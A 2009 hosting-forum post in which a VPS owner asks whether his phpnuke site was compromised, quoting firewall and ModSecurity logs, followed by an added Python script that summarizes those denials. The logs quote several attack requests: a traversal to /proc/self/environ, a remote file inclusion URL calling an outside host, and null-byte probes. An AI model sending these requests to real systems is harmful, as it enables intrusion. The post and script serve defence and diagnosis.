
Have I been hacked?

Discussion in 'General Discussion' started by mattb37, May 18, 2009.

    Services fail after UTF8 Abuse attack

    Hi, I have been a little worried about the security on my cPanel VPS, at my previous host my account was hacked and a phishing scam was launched from it. Now I am fully independent I don’t want the same thing happening again. Sorry for the lengthy post in advance but this is probably the best way I can get my situation across.

    The website in question runs phpnuke platinum which I know is very vulnerable to attacks, I have been trying to prevent the daily XSS attacks I get by disabling "allow_url_fopen" in php but I have still received notifications that remote exploits were being run.

    Here is what I have had reported from lfd today.

    18:15 - LFD blocks an IP address for running UTF8 Encoding Abuse Attacks. IP address logged (85.214.145.133) as originating from Germany; later attacks I have had logged came from the same IP address range, prompting me to terminate all unnecessary services.

    Code:
    [Mon May 18 18:10:00 2009] [error] [client 85.214.145.133] ModSecurity: Access denied with code 406 (phase 2). Invalid UTF-8 encoding: invalid byte value in character at ARGS:uid. [offset "39"] [file "/usr/local/apache/conf/modsec2.user.conf"] [line "23"] [id "950801"] [msg "UTF8 Encoding Abuse Attack Attempt"] [severity "WARNING"] [hostname "www.novavets.com"] [uri "/modules.php"] [unique_id "ShGWaE6B-DQAAHb6fwsAAAAI"]
    
    [Mon May 18 18:10:03 2009] [error] [client 85.214.145.133] ModSecurity: Access denied with code 406 (phase 2). Invalid UTF-8 encoding: invalid byte value in character at ARGS:year. [offset "41"] [file "/usr/local/apache/conf/modsec2.user.conf"] [line "23"] [id "950801"] [msg "UTF8 Encoding Abuse Attack Attempt"] [severity "WARNING"] [hostname "www.novavets.com"] [uri "/modules.php"] [unique_id "ShGWa06B-DQAAA4kF2kAAAAA"]
    
    [Mon May 18 18:14:32 2009] [error] [client 85.214.145.133] ModSecurity: Access denied with code 406 (phase 2). Invalid UTF-8 encoding: invalid byte value in character at ARGS_NAMES:nuke\\xa7bb\\xa7root\\xa7path. [offset "4"] [file "/usr/local/apache/conf/modsec2.user.conf"] [line "23"] [id "950801"] [msg "UTF8 Encoding Abuse Attack Attempt"] [severity "WARNING"] [hostname "yournovavets.com"] [uri "/modules/Forums/favorites.php"] [unique_id "ShGXeE6B-DQAAHb7f94AAAAL"]
    
    [Mon May 18 18:14:45 2009] [error] [client 85.214.145.133] ModSecurity: Access denied with code 406 (phase 2). Invalid UTF-8 encoding: invalid byte value in character at ARGS:sid. [offset "36"] [file "/usr/local/apache/conf/modsec2.user.conf"] [line "23"] [id "950801"] [msg "UTF8 Encoding Abuse Attack Attempt"] [severity "WARNING"] [hostname "www.novavets.com"] [uri "/modules.php"] [unique_id "ShGXhU6B-DQAAA4kF2sAAAAA"]
    
    [Mon May 18 18:14:51 2009] [error] [client 85.214.145.133] ModSecurity: Access denied with code 406 (phase 2). Invalid UTF-8 encoding: invalid byte value in character at ARGS:uid. [offset "37"] [file "/usr/local/apache/conf/modsec2.user.conf"] [line "23"] [id "950801"] [msg "UTF8 Encoding Abuse Attack Attempt"] [severity "WARNING"] [hostname "www.novavets.com"] [uri "/modules.php"] [unique_id "ShGXi06B-DQAAC0VTA0AAAAJ"]
    
    19:18 - spamd, sshd & named fail.
    19:30 - PHP nuke fusion reports SQL exploit, IP address 85.214.73.46 banned by nuke.

    Code:
    Cause: Breach attempt on file admin.php or attempted to use SQL exploit Url String: /arcade.php?phpbb_root_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ
    20:19 - ftpd, mysql failed
    20:26 - XSS attack on php nuke cms

    Code:
    The user Anonymous was on the page admin.php on your site NovaVets Ip is: 85.214.73.46 User Agent: Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4
    Date: 2009.05.18 21:26:19
    Used Url: /admin.php?include_path=http:/www.fmf2004.hu/buggsbunny??
    
    20:38 - System integrity check failed on LFD and CSF (md5)

    Code:
    The following list of files have FAILED the md5sum comparison test. This means that the file has been changed in some way. This could be a result of an OS update or application upgrade. If the change is unexpected it should be investigated:
    
    /usr/sbin/csf: FAILED
    /etc/init.d/csf: FAILED
    /etc/init.d/lfd: FAILED
    
    20:19 - ftpd failed

    20:43 - I logged in via ssh, terminated unrequired services (httpd, ftp, pop, exim, named, imap & cpservd), backed up home directory to an external server, rebooted system. Upon system rebooting CSF would not start and I had to rebuild the csf conf.

    22:19 - enabled all services terminated at 20:43, rebooted system and it seems to be running fine.

    My mod security log has been showing 127.0.0.1 as requesting pages with the following get statements:
    • /%00/ HTTP/1.0
    • /index.jsp%00x HTTP/1.0
    • /ext.ini.%00.txt HTTP/1.0
    • /web-console/ServerInfo.jsp%00 HTTP/1.0

    Could the above list be an exploit being run on the system?

    Regarding the XSS attacks and me failing to disable the "allow_url_fopen" how would I be best to proceed in disabling this function? I have tried and failed to find a solution over the past week or so.

    What can I do about the UTF8 abuse? Is there something I can run to check the security on my VPS, and what damage, if any, could have been done? I am running CSF but am very restricted as to the amount of rules I can apply, keep hitting the 191/200 numiptent error. I might move all my web services to a dedicated server which I know would fix this and allow me to run a much larger set of rules.

    With everything above, is it likely that my system has been compromised and I should be thinking about rebuilding various parts of it, particularly the services which failed the md5 check? I have changed passwords but I get the feeling that might not be enough with processes being run locally.

    Thanks for reading this far and any replies would be much appreciated.

    Matt.
     
    #1 mattb37, May 18, 2009
    Last edited: May 18, 2009
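The ModSecurity entries quoted in the post above follow the Apache error-log format that ModSecurity 2.x writes (`[client IP] ModSecurity: <message> [key "value"] ...`). The script below is an added example, not part of the original post and not cPanel's, CSF's or ModSecurity's own code: it parses that line format, counts denials per source IP and per rule id so a repeat offender like 85.214.145.133 stands out, and separately flags request paths that decode to a null byte (`%00`), like the ones the poster saw logged from 127.0.0.1. The sample log is constructed from the five lines quoted in the post; the "repeat offender" threshold of three hits is an assumption, not a ModSecurity or CSF default.

```python
"""Summarize ModSecurity 2.x denials from an Apache error log (added example)."""
import re
from collections import Counter
from urllib.parse import unquote

# Sample log constructed from the five ModSecurity entries quoted in the post.
SAMPLE_LOG = r"""
[Mon May 18 18:10:00 2009] [error] [client 85.214.145.133] ModSecurity: Access denied with code 406 (phase 2). Invalid UTF-8 encoding: invalid byte value in character at ARGS:uid. [offset "39"] [file "/usr/local/apache/conf/modsec2.user.conf"] [line "23"] [id "950801"] [msg "UTF8 Encoding Abuse Attack Attempt"] [severity "WARNING"] [hostname "www.novavets.com"] [uri "/modules.php"] [unique_id "ShGWaE6B-DQAAHb6fwsAAAAI"]
[Mon May 18 18:10:03 2009] [error] [client 85.214.145.133] ModSecurity: Access denied with code 406 (phase 2). Invalid UTF-8 encoding: invalid byte value in character at ARGS:year. [offset "41"] [file "/usr/local/apache/conf/modsec2.user.conf"] [line "23"] [id "950801"] [msg "UTF8 Encoding Abuse Attack Attempt"] [severity "WARNING"] [hostname "www.novavets.com"] [uri "/modules.php"] [unique_id "ShGWa06B-DQAAA4kF2kAAAAA"]
[Mon May 18 18:14:32 2009] [error] [client 85.214.145.133] ModSecurity: Access denied with code 406 (phase 2). Invalid UTF-8 encoding: invalid byte value in character at ARGS_NAMES:nuke\xa7bb\xa7root\xa7path. [offset "4"] [file "/usr/local/apache/conf/modsec2.user.conf"] [line "23"] [id "950801"] [msg "UTF8 Encoding Abuse Attack Attempt"] [severity "WARNING"] [hostname "yournovavets.com"] [uri "/modules/Forums/favorites.php"] [unique_id "ShGXeE6B-DQAAHb7f94AAAAL"]
[Mon May 18 18:14:45 2009] [error] [client 85.214.145.133] ModSecurity: Access denied with code 406 (phase 2). Invalid UTF-8 encoding: invalid byte value in character at ARGS:sid. [offset "36"] [file "/usr/local/apache/conf/modsec2.user.conf"] [line "23"] [id "950801"] [msg "UTF8 Encoding Abuse Attack Attempt"] [severity "WARNING"] [hostname "www.novavets.com"] [uri "/modules.php"] [unique_id "ShGXhU6B-DQAAA4kF2sAAAAA"]
[Mon May 18 18:14:51 2009] [error] [client 85.214.145.133] ModSecurity: Access denied with code 406 (phase 2). Invalid UTF-8 encoding: invalid byte value in character at ARGS:uid. [offset "37"] [file "/usr/local/apache/conf/modsec2.user.conf"] [line "23"] [id "950801"] [msg "UTF8 Encoding Abuse Attack Attempt"] [severity "WARNING"] [hostname "www.novavets.com"] [uri "/modules.php"] [unique_id "ShGXi06B-DQAAC0VTA0AAAAJ"]
"""

# Request paths constructed from the 127.0.0.1 entries listed in the post,
# plus one ordinary request that should not be flagged.
NULL_BYTE_PROBES = ["/%00/", "/index.jsp%00x", "/ext.ini.%00.txt", "/web-console/ServerInfo.jsp%00"]
SAMPLE_PATHS = NULL_BYTE_PROBES + ["/modules.php?name=News"]

# Fixed prefix of every ModSecurity 2.x error-log line: timestamp, level, client IP.
HEAD_RE = re.compile(
    r"^\[(?P<ts>[^\]]+)\] \[error\] \[client (?P<ip>\d{1,3}(?:\.\d{1,3}){3})\] "
    r"ModSecurity: (?P<rest>.*)$"
)
# The trailing [key "value"] pairs (offset, file, line, id, msg, severity, hostname, uri, unique_id).
TAG_RE = re.compile(r'\[(\w+) "([^"]*)"\]')
# The variable the rule matched on, e.g. "ARGS:uid", which ends the free-text message.
TARGET_RE = re.compile(r" at (\S+?)\.$")

ASSUMED_BLOCK_THRESHOLD = 3  # assumption: hits per IP before it is worth a manual look


def parse_line(line):
    """Return a dict for one ModSecurity denial line, or None for anything else."""
    m = HEAD_RE.match(line)
    if not m:
        return None
    rest = m.group("rest")
    event = {"ts": m.group("ts"), "ip": m.group("ip")}
    event.update(TAG_RE.findall(rest))          # bracketed key/value tags become fields
    message = TAG_RE.sub("", rest).strip()      # what is left is the free-text reason
    event["message"] = message
    code = re.search(r"Access denied with code (\d+)", message)
    event["status"] = int(code.group(1)) if code else None
    target = TARGET_RE.search(message)
    event["target"] = target.group(1) if target else None
    return event


def parse_log(text):
    """Parse every ModSecurity denial in an error-log excerpt, skipping other lines."""
    events = []
    for line in text.splitlines():
        ev = parse_line(line.strip())
        if ev:
            events.append(ev)
    return events


def summarize(events, threshold=ASSUMED_BLOCK_THRESHOLD):
    """Count denials per source IP and per (rule id, msg); list IPs at or over threshold."""
    by_ip = Counter(e["ip"] for e in events)
    by_rule = Counter((e.get("id"), e.get("msg")) for e in events)
    offenders = sorted(ip for ip, n in by_ip.items() if n >= threshold)
    return {"by_ip": dict(by_ip), "by_rule": dict(by_rule), "repeat_offenders": offenders}


def flag_null_byte_probes(paths):
    """Return the request paths that contain a percent-encoded null byte after decoding."""
    return [p for p in paths if "\x00" in unquote(p)]


if __name__ == "__main__":
    evs = parse_log(SAMPLE_LOG)
    report = summarize(evs)
    for ip, n in report["by_ip"].items():
        print(f"{ip}: {n} denials")
    for (rule_id, msg), n in report["by_rule"].items():
        print(f"rule {rule_id} ({msg}): {n}")
    print("repeat offenders:", report["repeat_offenders"])
    print("null-byte probes:", flag_null_byte_probes(SAMPLE_PATHS))
```

Run it against `/usr/local/apache/logs/error_log` by replacing `SAMPLE_LOG` with the file's contents; the per-rule counts tell you whether one rule id (950801 here) accounts for all the noise, and the per-IP counts are the evidence to keep alongside whatever CSF already blocked.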